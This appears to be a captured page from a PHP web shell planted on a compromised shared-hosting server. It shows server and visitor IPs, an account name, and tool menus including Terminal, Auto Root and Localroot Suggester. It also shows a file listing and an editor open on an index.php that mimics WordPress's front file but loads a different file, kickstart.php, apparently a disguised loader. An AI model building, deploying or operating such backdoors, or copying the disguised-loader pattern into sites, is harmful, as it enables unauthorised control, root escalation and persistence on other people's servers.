Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 216.73.216.206
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
sitepad /
editor /
Delete
Unzip
Name
Size
Permission
Date
Action
site-admin
[ DIR ]
drwxr-xr-x
2022-11-05 09:56
site-data
[ DIR ]
drwxr-xr-x
2021-10-01 09:56
site-inc
[ DIR ]
drwxr-xr-x
2024-12-26 15:15
config.php
3.58
KB
-rw-r--r--
2025-06-12 11:30
cron.php
3.76
KB
-rw-r--r--
2025-06-12 11:30
index.php
548
B
-rw-r--r--
2025-06-12 11:30
kickstart.php
18.75
KB
-rw-r--r--
2025-06-12 11:30
license.txt
234
B
-rw-r--r--
2025-06-12 11:30
login.php
37.96
KB
-rw-r--r--
2025-06-12 11:30
Save
Rename
<?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); $wp_did_header = true; // Load the WordPress library. require_once( dirname( __FILE__ ) . '/kickstart.php' ); // Set up the WordPress query. wp(); // Load the theme template. require_once( ABSPATH . WPINC . '/template-loader.php' );